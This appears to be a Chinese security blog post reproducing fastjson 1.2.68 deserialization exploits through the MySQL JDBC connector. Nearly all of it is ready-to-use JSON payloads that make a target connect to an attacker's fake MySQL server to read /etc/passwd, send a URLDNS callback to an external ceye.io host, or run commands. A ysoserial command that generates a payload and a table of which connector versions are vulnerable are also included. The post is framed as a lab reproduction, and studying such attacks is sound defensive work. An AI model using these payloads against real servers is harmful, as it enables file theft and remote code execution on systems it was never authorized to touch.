前言
整理复现一下互联网fastjson 高版本jdbc利用。
fastjson 1.2.68 版本与jdbc
mysql-connector-java = 8.0.19时
可读取文件
{
"@type": "java.lang.AutoCloseable",
"@type": "com.mysql.cj.jdbc.ha.ReplicationMySQLConnection",
"proxy": {
"@type": "com.mysql.cj.jdbc.ha.LoadBalancedConnectionProxy",
"connectionUrl": {
"@type": "com.mysql.cj.conf.url.ReplicationConnectionUrl",
"masters": [
{
"host": "10.211.55.2"
}
],
"slaves": [],
"properties": {
"host": "10.211.55.2",
"user": "fileread_/etc/passwd",
"dbname": "dbname",
"password": "pass",
"queryInterceptors": "com.mysql.cj.jdbc.interceptors.ServerStatusDiffInterceptor",
"autoDeserialize": "true",
"allowLoadLocalInfile": "true"
}
}
}
}
可URLDNS
{
"@type": "java.lang.AutoCloseable",
"@type": "com.mysql.cj.jdbc.ha.ReplicationMySQLConnection",
"proxy": {
"@type": "com.mysql.cj.jdbc.ha.LoadBalancedConnectionProxy",
"connectionUrl": {
"@type": "com.mysql.cj.conf.url.ReplicationConnectionUrl",
"masters": [
{
"host": "10.211.55.2"
}
],
"slaves": [],
"properties": {
"host": "10.211.55.2",
"user": "deser_URLDNS_http://xxs.decftp.ceye.io",
"dbname": "dbname",
"password": "pass",
"queryInterceptors": "com.mysql.cj.jdbc.interceptors.ServerStatusDiffInterceptor",
"autoDeserialize": "true",
"allowLoadLocalInfile": "true"
}
}
}
}
可命令执行
image.png
image.png
{
"@type": "java.lang.AutoCloseable",
"@type": "com.mysql.cj.jdbc.ha.ReplicationMySQLConnection",
"proxy": {
"@type": "com.mysql.cj.jdbc.ha.LoadBalancedConnectionProxy",
"connectionUrl": {
"@type": "com.mysql.cj.conf.url.ReplicationConnectionUrl",
"masters": [
{
"host": "10.211.55.2"
}
],
"slaves": [],
"properties": {
"host": "10.211.55.2",
"user": "test",
"dbname": "dbname",
"password": "pass",
"queryInterceptors": "com.mysql.cj.jdbc.interceptors.ServerStatusDiffInterceptor",
"autoDeserialize": "true",
"allowLoadLocalInfile": "true"
}
}
}
}
mysql-connector-java = 6.0.2时,poc为
{
"@type": "java.lang.AutoCloseable",
"@type": "com.mysql.cj.jdbc.ha.LoadBalancedMySQLConnection",
"proxy": {
"connectionString": {
"url": "jdbc:mysql://10.211.55.2:3306/test?allowLoadLocalInfile=true&autoDeserialize=true&statementInterceptors=com.mysql.cj.jdbc.interceptors.ServerStatusDiffInterceptor&user=fileread_/etc/passwd"
}
}
}
使用
java -jar ysoserial-0.0.6-SNAPSHOT-all.jar Fastjson1 "open -a Calculator" > payload
生成payload
image.png
而后使用 fake-mysql-gui-0.0.4.jar 启动端口。可命令执行。
image.png
5.1.11 > mysql-connector-java > 5.1.48 时,poc为
{
"@type": "java.lang.AutoCloseable",
"@type": "com.mysql.jdbc.JDBC4Connection",
"hostToConnectTo": "127.0.0.1",
"portToConnectTo": 3306,
"info": {
"user": "fileread_/etc/passwd",
"password": "3306",
"maxAllowedPacket": "655360",
"statementInterceptors": "com.mysql.jdbc.interceptors.ServerStatusDiffInterceptor",
"autoDeserialize": "true",
"NUM_HOSTS": "1"
},
"databaseToConnectTo": "dbname",
"url": ""
}
总结
| 1.2.36 版本 > fastjson > 1.2.68 版本 | 读取文件 | URLDNS | 命令执行 |
|---|---|---|---|
| mysql-connector-java > 8.0.19 | ✓ | x | x |
| mysql-connector-java = 8.0.19 | ✓ | ✓ | ✓ |
| mysql-connector-java < 8.0.19 | x | x | x |
| mysql-connector-java = 6.0.2 | ✓ | ✓ | ✓ |
| mysql-connector-java = 6.0.3 | ✓ | ✓ | ✓ |
| 5.1.10 < mysql-connector-java <= 5.1.48 | ✓ | ✓ | ✓ |
